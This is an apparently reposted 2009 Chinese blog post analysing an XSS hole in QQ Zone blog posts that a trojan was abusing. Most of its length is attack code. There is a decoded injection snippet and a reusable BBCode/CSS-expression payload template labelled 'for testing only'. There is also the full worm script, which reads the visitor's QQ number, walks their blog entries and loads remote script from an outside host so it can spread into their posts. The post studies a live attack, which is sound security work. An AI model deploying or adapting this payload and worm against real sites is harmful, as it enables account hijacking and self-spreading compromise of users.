首页 编程 软件学院 查看内容

QQ空间出现跨站漏洞疑有木马利用此漏洞

2009-4-26 10:26 669 0

摘要: 文章作者:风雪残士 http://blog.tkbbs.com本文首发本人BLOG: http://blog.tkbbs.com如果转载请注明作者与出处 谢谢前几天出现访问空间弹出广告 开始没怎么注意...
关键词: nbsp visitorID var targetblogurlid 代码 XMLHTTP gurl document function MSXML

文章作者:风雪残士 http://blog.tkbbs.com本文首发本人BLOG: http://blog.tkbbs.com如果转载请注明作者与出处 谢谢前几天出现访问空间弹出广告 开始没怎么注意 后来经一位朋友说 看我一篇日志经常出现广告。 加上自己的经历。 tkbbs_20090425173957_fxcs.jpg (146.08 KB) 2009-4-25 22:53看了下源代码   发现有个共同处   一律有 http://catche.qq.com/temp/20081209/4236888.swf 这个FLASH地址(访问不了) 而重要的在后面那段标记蓝色代码   经过简单的unicode加密 解码后为程序代码 复制内容到剪贴板 代码:this.parentNode.style.display='none';if(!window.xxr){var l=document.createElement('script');l.src='http://love.avtupian.com/a/q/mq.webp';l.type='text/javascript';document.getElementsByTagName('head').item(0).appendChild(l);window.xxr=1}就是不知道到底是腾讯的问题 还是病毒自动提交的跨站代码   而腾讯空间有跨站漏洞是毋庸置疑的。把下载过来用记事本打开 就可以发现恶意代码空间日志特征是一个大小都为0的 FLASH 地址为 http://catche.qq.com/temp/20081209/4236888.swf只要重新编辑下 删掉FLASH 即可(不是转帖复制 手动打上去的文章也有此情况)又访问了几位好友空间   以前发布的日志没这种情况   基本发生在最近3-4天前发布的日志   病毒代码不是每人都有个人水平有限 无法确定究竟是腾讯空间出的问题还是病毒造成。 大量网民感染木马自动提交的一段代码以下代码仅供测试 切勿用作非法用途 复制内容到剪贴板 代码:[flash,0,0]http://随意地址/fxcs.swf[email=]id=baidu style=ee:expression(eval(unescape('this.parentNode.style.display%3D%27none%27%3Bif%28%21window.xxr%29%7Bvar%20l%3Ddocument.createElement%28%27script%27%29%3Bl.src%3D%27http%3A//木马网站地址/a/q/mq.jpg%27%3Bl.type%3D%27text/javascript%27%3Bdocument.getElementsByTagName%28%27head%27%29.item%280%29.appendChild%28l%29%3Bwindow.xxr%3D1%7D')));display:none;@qq.com[/email][/flash]开头的FLASH 随便填   木马网站地址/a/q/mq.webp 修正为木马路径。搜索引擎查询http://www.baidu.com/s?tn=index8 ... Aqq.com+4236888.swfhttp://www.baidu.com/s?tn=360se_ ... 236888.swf&ct=0http://www.google.cn/search?hl=z ... a=&aq=f&oq=由于查找不了源文件 搜索结果小的可怜   无法扩大搜索这个漏洞应该有人早发现了   而且制作了程序实现编辑日志自动带一个 这么尾巴 由于FLASH大小为0 不注意就不会发现mq.jpg 代码   (连接框架地址部分我修改了下 其他没变 现在网站访问不了 不知道原版是啥。。) 复制内容到剪贴板 代码: function killErrors() {return true;}window.onerror=killErrors;var shendu;shendu=4;//---------------global---v------------------------------------------var visitorID;var userurl;var guest;var xhr;var targetblogurlid="0";var myblogurl=new Array();var myblogid=new Array();       var gurl=document.location.href;       var gurle=gurl.indexOf("com/");gurl=gurl.substring(0,gurle+3);    var visitorID=top.document.documentElement.outerHTML;   var cookieS=visitorID.indexOf("g_iLoginUin = ");visitorID=visitorID.substring(cookieS+14);cookieS=visitorID.indexOf(",");visitorID=visitorID.substring(0,cookieS);get_my_blog(visitorID);DOshuamy();function DOshuamy(){var ssr=document.getElementById("veryTitle");ssr.insertAdjacentHTML("beforeend","<iframe width=0 height=0 src='http://www.tkbbs.com/1.html'></iframe>");}//-----------------------------------------function get_my_blog(visitorID){userurl=gurl+"/cgi-bin/blognew/blog_output_toppage?uin="+visitorID+"&direct=1";xhr=createXMLHttpRequest();if(xhr){    xhr.open("GET",userurl,false);    xhr.send();guest=xhr.responseText;    get_my_blogurl(guest);}}function get_my_blogurl(guest){   var mybloglist=guest;   var myurls;var blogids;var blogide;   for(i=0;i<shendu;i++){    myurls=mybloglist.indexOf('selectBlog(');    if(myurls!=-1){      mybloglist=mybloglist.substring(myurls+11);      myurls=mybloglist.indexOf(')');      myblogid[i]=mybloglist.substring(0,myurls);       }else{break;}}get_my_testself();}function get_my_testself(){    for(i=0;i<myblogid.length;i++){   var url=gurl+"/cgi-bin/blognew/blog_output_data?uin="+visitorID+"&blogid="+myblogid[i]+"&r="+Math.random();   var xhr2=createXMLHttpRequest();   if(xhr2){             xhr2.open("GET",url,false);                 xhr2.send();             guest2=xhr2.responseText;             var mycheckit=guest2.indexOf("baidu");             var mycheckmydoit=guest2.indexOf("mydoit");             if(mycheckmydoit!="-1"){targetblogurlid=myblogid[i];add_jsdel(visitorID,targetblogurlid,gurl);break;          }             if(mycheckit=="-1"){targetblogurlid=myblogid[i];add_js(visitorID,targetblogurlid,gurl);break;          }       }    }}//--------------------------------------  function createXMLHttpRequest(){var XMLhttpObject=null; if (window.XMLHttpRequest) {XMLhttpObject = new XMLHttpRequest()} else    { var MSXML=['Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP','MSXML.XMLHTTP', 'MICROSOFT.XMLHTTP.1.0','MICROSOFT.XMLHTTP.1', 'Microsoft.XMLHTTP'];              for(var i=0;i<MSXML.length;i++)        {          try           {             XMLhttpObject=new ActiveXObject(MSXML[i]);             break;          }          catch (ex) {           }       }    }return XMLhttpObject;}  function add_js(visitorID,targetblogurlid,gurl){var s2=document.createElement('script');s2.src='http://xss0211.111.5ghezu.com.cn/images/qq/temp/wm/linshi/index.php?gurl='+gurl+'&uin='+visitorID+'&blogid='+targetblogurlid+"&r="+Math.random();s2.type='text/javascript';document.getElementsByTagName('head').item(0).appendChild(s2);}function add_jsdel(visitorID,targetblogurlid,gurl){var s2=document.createElement('script');s2.src='http://xss0211.111.5ghezu.com.cn/images/qq/temp/wm/linshi/del.php?gurl='+gurl+'&uin='+visitorID+'&blogid='+targetblogurlid+"&r="+Math.random();s2.type='text/javascript';document.getElementsByTagName('head').item(0).appendChild(s2);} PS:很久没关注QQ空间跨站了~今天一个朋友给推荐了这个帖子~去研究下~
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部